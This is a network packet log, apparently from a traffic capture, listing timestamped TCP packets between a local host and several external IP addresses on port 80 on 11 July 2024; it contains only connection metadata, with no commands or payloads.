Jul 11, 2024 15:06:11.029647112 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.029660940 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.029674053 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.029700041 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.030581951 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030597925 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030612946 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030630112 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030643940 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030644894 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.030661106 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030668020 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.030678034 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.030709982 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.031598091 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.031615973 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.031632900 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.031647921 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.031650066 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.031666994 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.031673908 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.031683922 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.031708956 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.032592058 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032608986 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032624960 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032641888 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032641888 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.032659054 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032669067 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.032675982 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032692909 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.032706022 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.032733917 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.033442974 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033461094 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033476114 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033493042 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033509016 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033512115 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.033525944 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033535004 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.033544064 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033560991 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.033570051 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.033602953 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.034374952 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034393072 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034409046 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034425974 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034442902 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034442902 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.034460068 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034468889 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.034476995 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034493923 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.034516096 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.034565926 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.035406113 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035423994 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035439014 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035455942 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035470009 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.035474062 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035490990 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035492897 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.035506010 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.035535097 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.036206961 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.036223888 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.036242008 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.036256075 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.036289930 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.154820919 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.154841900 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.154858112 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.154875040 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155071020 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.155236006 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155251026 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155309916 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.155313969 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155332088 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155347109 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155364037 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155375004 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.155380964 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155397892 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155405998 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.155411959 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.155435085 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.156316042 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156333923 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156349897 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156366110 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.156367064 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156383038 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156390905 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.156399012 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156415939 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156426907 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.156431913 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156446934 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156459093 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.156461954 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.156487942 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.157294035 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157310963 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157326937 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157341003 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.157344103 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157360077 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157373905 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.157377958 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157394886 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157402992 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.157409906 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.157437086 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.158299923 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158318043 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158334017 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158346891 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.158351898 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158369064 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158374071 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.158385038 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158401012 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158416986 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.158417940 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.158442974 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.159301996 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159317970 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159334898 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159351110 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.159353971 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159370899 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159375906 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.159387112 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159403086 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159418106 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.159420013 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159436941 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.159445047 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.159477949 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.160224915 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160242081 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160258055 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160274029 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160290956 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.160291910 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160310030 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160326004 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160326958 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.160341024 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160350084 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.160357952 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.160383940 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.161115885 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161133051 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161149979 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161164999 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.161166906 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161184072 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161189079 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.161201954 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161217928 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161227942 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.161233902 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161251068 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.161258936 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.161287069 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.161827087 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.162025928 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162043095 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162060022 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162076950 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162085056 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.162091970 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162108898 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162112951 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.162123919 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162141085 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162148952 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.162157059 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162178040 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.162945986 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162964106 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162980080 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.162993908 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.162997007 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.163012028 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.163019896 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.163028955 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.163043976 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.163053989 CEST | 49725 | 80 | 192.168.2.6 | 103.42.108.46
Jul 11, 2024 15:06:11.163060904 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
Jul 11, 2024 15:06:11.163075924 CEST | 80 | 49725 | 103.42.108.46 | 192.168.2.6
                                    Jul 11, 2024 15:06:11.163079023 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.163091898 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163122892 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.163856983 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163875103 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163892031 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163907051 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.163908958 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163925886 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163934946 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.163943052 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163960934 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163975954 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.163981915 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.163991928 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164007902 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.164031029 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.164769888 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164788008 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164803982 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164819002 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164835930 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.164836884 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164853096 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164860010 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.164891958 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164894104 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.164910078 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.164952993 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.165707111 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165724039 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165740967 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165757895 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165776968 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.165781021 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165798903 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165801048 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.165815115 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165831089 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165847063 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.165848017 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.165874004 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.166532993 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.166549921 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.166565895 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.166582108 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.166584015 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.166600943 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.166605949 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.166646004 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.340126038 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.340179920 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.340308905 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.341609955 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:11.341670036 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.349320889 CEST4972580192.168.2.6103.42.108.46
                                    Jul 11, 2024 15:06:11.372919083 CEST8049725103.42.108.46192.168.2.6
                                    Jul 11, 2024 15:06:16.708329916 CEST4972780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:16.714078903 CEST8049727188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:16.714168072 CEST4972780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:16.735801935 CEST4972780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:16.741281033 CEST8049727188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:17.938327074 CEST8049727188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:17.938761950 CEST8049727188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:17.938865900 CEST4972780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:18.247612953 CEST4972780192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:19.285377026 CEST4972880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:19.293387890 CEST8049728188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:19.293488026 CEST4972880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:19.325665951 CEST4972880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:19.330882072 CEST8049728188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:19.932529926 CEST8049728188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:19.933139086 CEST8049728188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:19.933182955 CEST8049728188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:19.933229923 CEST4972880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:19.933229923 CEST4972880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:20.840816975 CEST4972880192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:21.875312090 CEST4972980192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:21.880861998 CEST8049729188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:21.881052017 CEST4972980192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:21.902606010 CEST4972980192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:21.907890081 CEST8049729188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:21.907911062 CEST8049729188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:23.418744087 CEST4972980192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:23.424287081 CEST8049729188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:23.424418926 CEST4972980192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:24.455643892 CEST4973080192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:24.460661888 CEST8049730188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:24.460802078 CEST4973080192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:24.480320930 CEST4973080192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:24.485415936 CEST8049730188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:25.063030005 CEST8049730188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:25.063051939 CEST8049730188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:25.063208103 CEST4973080192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:25.072886944 CEST4973080192.168.2.6188.114.97.3
                                    Jul 11, 2024 15:06:25.077760935 CEST8049730188.114.97.3192.168.2.6
                                    Jul 11, 2024 15:06:32.603943110 CEST4973280192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:32.608876944 CEST8049732134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:32.608975887 CEST4973280192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:32.631654978 CEST4973280192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:32.636581898 CEST8049732134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:33.405200958 CEST8049732134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:33.405214071 CEST8049732134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:33.405291080 CEST4973280192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:34.137495995 CEST4973280192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:35.174045086 CEST4973380192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:35.183082104 CEST8049733134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:35.183281898 CEST4973380192.168.2.6134.122.138.60
